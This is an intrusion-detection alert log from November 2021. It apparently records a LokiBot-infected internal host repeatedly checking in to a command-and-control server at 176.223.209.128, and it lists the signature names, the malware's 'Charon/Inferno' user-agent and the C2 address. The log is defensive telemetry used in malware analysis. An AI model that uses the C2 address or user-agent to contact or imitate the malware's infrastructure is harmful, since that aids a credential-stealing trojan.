11/25/21-10:49:15.668863	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49968	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.668863	TCP	2025381	ET TROJAN LokiBot Checkin	49968	80	192.168.11.20	176.223.209.128
11/25/21-10:49:15.668863	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49968	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.184502	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49969	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.184502	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49969	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.184502	TCP	2025381	ET TROJAN LokiBot Checkin	49969	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.184502	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49969	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.721053	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49970	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.721053	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49970	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.721053	TCP	2025381	ET TROJAN LokiBot Checkin	49970	80	192.168.11.20	176.223.209.128
11/25/21-10:49:16.721053	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49970	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.213581	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49971	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.213581	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49971	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.213581	TCP	2025381	ET TROJAN LokiBot Checkin	49971	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.213581	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49971	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.716881	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49972	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.716881	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49972	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.716881	TCP	2025381	ET TROJAN LokiBot Checkin	49972	80	192.168.11.20	176.223.209.128
11/25/21-10:49:17.716881	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49972	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.186520	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49973	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.186520	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49973	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.186520	TCP	2025381	ET TROJAN LokiBot Checkin	49973	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.186520	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49973	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.695896	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49974	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.695896	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49974	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.695896	TCP	2025381	ET TROJAN LokiBot Checkin	49974	80	192.168.11.20	176.223.209.128
11/25/21-10:49:18.695896	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49974	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.208676	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49975	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.208676	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49975	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.208676	TCP	2025381	ET TROJAN LokiBot Checkin	49975	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.208676	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49975	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.734180	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49976	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.734180	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49976	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.734180	TCP	2025381	ET TROJAN LokiBot Checkin	49976	80	192.168.11.20	176.223.209.128
11/25/21-10:49:19.734180	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49976	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.231014	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49977	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.231014	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49977	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.231014	TCP	2025381	ET TROJAN LokiBot Checkin	49977	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.231014	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49977	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.695066	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49978	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.695066	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49978	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.695066	TCP	2025381	ET TROJAN LokiBot Checkin	49978	80	192.168.11.20	176.223.209.128
11/25/21-10:49:20.695066	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49978	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.204317	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49979	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.204317	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49979	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.204317	TCP	2025381	ET TROJAN LokiBot Checkin	49979	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.204317	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49979	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.725257	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49980	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.725257	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49980	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.725257	TCP	2025381	ET TROJAN LokiBot Checkin	49980	80	192.168.11.20	176.223.209.128
11/25/21-10:49:21.725257	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49980	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.161051	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49981	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.161051	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49981	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.161051	TCP	2025381	ET TROJAN LokiBot Checkin	49981	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.161051	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49981	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.694084	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49982	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.694084	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49982	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.694084	TCP	2025381	ET TROJAN LokiBot Checkin	49982	80	192.168.11.20	176.223.209.128
11/25/21-10:49:22.694084	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49982	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.236990	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49983	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.236990	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49983	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.236990	TCP	2025381	ET TROJAN LokiBot Checkin	49983	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.236990	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49983	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.750984	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49984	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.750984	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49984	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.750984	TCP	2025381	ET TROJAN LokiBot Checkin	49984	80	192.168.11.20	176.223.209.128
11/25/21-10:49:23.750984	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49984	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.261506	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49985	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.261506	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49985	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.261506	TCP	2025381	ET TROJAN LokiBot Checkin	49985	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.261506	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49985	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.765311	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49986	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.765311	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49986	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.765311	TCP	2025381	ET TROJAN LokiBot Checkin	49986	80	192.168.11.20	176.223.209.128
11/25/21-10:49:24.765311	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49986	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.270321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49987	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.270321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49987	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.270321	TCP	2025381	ET TROJAN LokiBot Checkin	49987	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.270321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49987	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.783039	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49988	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.783039	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49988	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.783039	TCP	2025381	ET TROJAN LokiBot Checkin	49988	80	192.168.11.20	176.223.209.128
11/25/21-10:49:25.783039	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49988	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.316918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49989	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.316918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49989	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.316918	TCP	2025381	ET TROJAN LokiBot Checkin	49989	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.316918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49989	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.841395	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49990	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.841395	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49990	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.841395	TCP	2025381	ET TROJAN LokiBot Checkin	49990	80	192.168.11.20	176.223.209.128
11/25/21-10:49:26.841395	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49990	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.357926	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49991	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.357926	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49991	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.357926	TCP	2025381	ET TROJAN LokiBot Checkin	49991	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.357926	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49991	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.861743	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49992	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.861743	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49992	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.861743	TCP	2025381	ET TROJAN LokiBot Checkin	49992	80	192.168.11.20	176.223.209.128
11/25/21-10:49:27.861743	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49992	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.402901	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49993	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.402901	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49993	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.402901	TCP	2025381	ET TROJAN LokiBot Checkin	49993	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.402901	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49993	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.926178	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49994	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.926178	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49994	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.926178	TCP	2025381	ET TROJAN LokiBot Checkin	49994	80	192.168.11.20	176.223.209.128
11/25/21-10:49:28.926178	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49994	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.395169	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49995	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.395169	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49995	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.395169	TCP	2025381	ET TROJAN LokiBot Checkin	49995	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.395169	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49995	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.871513	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49996	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.871513	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49996	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.871513	TCP	2025381	ET TROJAN LokiBot Checkin	49996	80	192.168.11.20	176.223.209.128
11/25/21-10:49:29.871513	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49996	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.393507	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49997	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.393507	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49997	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.393507	TCP	2025381	ET TROJAN LokiBot Checkin	49997	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.393507	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49997	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.922836	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49998	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.922836	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49998	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.922836	TCP	2025381	ET TROJAN LokiBot Checkin	49998	80	192.168.11.20	176.223.209.128
11/25/21-10:49:30.922836	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49998	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.432081	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49999	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.432081	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49999	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.432081	TCP	2025381	ET TROJAN LokiBot Checkin	49999	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.432081	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49999	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.950901	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50000	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.950901	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50000	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.950901	TCP	2025381	ET TROJAN LokiBot Checkin	50000	80	192.168.11.20	176.223.209.128
11/25/21-10:49:31.950901	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50000	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.411503	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50001	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.411503	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50001	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.411503	TCP	2025381	ET TROJAN LokiBot Checkin	50001	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.411503	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50001	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.838212	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50002	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.838212	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50002	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.838212	TCP	2025381	ET TROJAN LokiBot Checkin	50002	80	192.168.11.20	176.223.209.128
11/25/21-10:49:32.838212	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50002	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.371009	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50003	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.371009	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50003	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.371009	TCP	2025381	ET TROJAN LokiBot Checkin	50003	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.371009	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50003	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.891069	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50004	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.891069	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50004	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.891069	TCP	2025381	ET TROJAN LokiBot Checkin	50004	80	192.168.11.20	176.223.209.128
11/25/21-10:49:33.891069	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50004	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.420369	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50005	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.420369	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50005	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.420369	TCP	2025381	ET TROJAN LokiBot Checkin	50005	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.420369	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50005	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.921609	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50006	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.921609	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50006	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.921609	TCP	2025381	ET TROJAN LokiBot Checkin	50006	80	192.168.11.20	176.223.209.128
11/25/21-10:49:34.921609	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50006	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.381645	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50007	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.381645	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50007	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.381645	TCP	2025381	ET TROJAN LokiBot Checkin	50007	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.381645	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50007	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.899719	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50008	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.899719	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50008	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.899719	TCP	2025381	ET TROJAN LokiBot Checkin	50008	80	192.168.11.20	176.223.209.128
11/25/21-10:49:35.899719	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50008	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.430850	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50009	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.430850	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50009	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.430850	TCP	2025381	ET TROJAN LokiBot Checkin	50009	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.430850	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50009	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.941067	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50010	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.941067	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50010	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.941067	TCP	2025381	ET TROJAN LokiBot Checkin	50010	80	192.168.11.20	176.223.209.128
11/25/21-10:49:36.941067	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50010	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.484066	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50011	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.484066	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50011	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.484066	TCP	2025381	ET TROJAN LokiBot Checkin	50011	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.484066	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50011	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.955485	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50012	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.955485	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50012	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.955485	TCP	2025381	ET TROJAN LokiBot Checkin	50012	80	192.168.11.20	176.223.209.128
11/25/21-10:49:37.955485	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50012	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.463778	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50013	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.463778	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50013	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.463778	TCP	2025381	ET TROJAN LokiBot Checkin	50013	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.463778	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50013	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.976726	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50014	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.976726	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50014	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.976726	TCP	2025381	ET TROJAN LokiBot Checkin	50014	80	192.168.11.20	176.223.209.128
11/25/21-10:49:38.976726	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50014	80	192.168.11.20	176.223.209.128
11/25/21-10:49:39.500286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50015	80	192.168.11.20	176.223.209.128
11/25/21-10:49:39.500286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50015	80	192.168.11.20	176.223.209.128
11/25/21-10:49:39.500286	TCP	2025381	ET TROJAN LokiBot Checkin	50015	80	192.168.11.20	176.223.209.128
11/25/21-10:49:39.500286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50015	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.035714	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50016	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.035714	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50016	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.035714	TCP	2025381	ET TROJAN LokiBot Checkin	50016	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.035714	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50016	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.546893	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50017	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.546893	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50017	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.546893	TCP	2025381	ET TROJAN LokiBot Checkin	50017	80	192.168.11.20	176.223.209.128
11/25/21-10:49:40.546893	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50017	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.083152	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50018	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.083152	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50018	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.083152	TCP	2025381	ET TROJAN LokiBot Checkin	50018	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.083152	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50018	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.586027	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50019	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.586027	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50019	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.586027	TCP	2025381	ET TROJAN LokiBot Checkin	50019	80	192.168.11.20	176.223.209.128
11/25/21-10:49:41.586027	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50019	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.108784	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50020	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.108784	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50020	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.108784	TCP	2025381	ET TROJAN LokiBot Checkin	50020	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.108784	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50020	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.628958	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50021	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.628958	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50021	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.628958	TCP	2025381	ET TROJAN LokiBot Checkin	50021	80	192.168.11.20	176.223.209.128
11/25/21-10:49:42.628958	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50021	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.093221	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50022	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.093221	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50022	80	192.168.11.20	176.223.209.128
11/25/21-10:49:43.093221	TCP	2025381	ET TROJAN LokiBot Checkin	50022	80	192.168.11.20	176.223.209.128
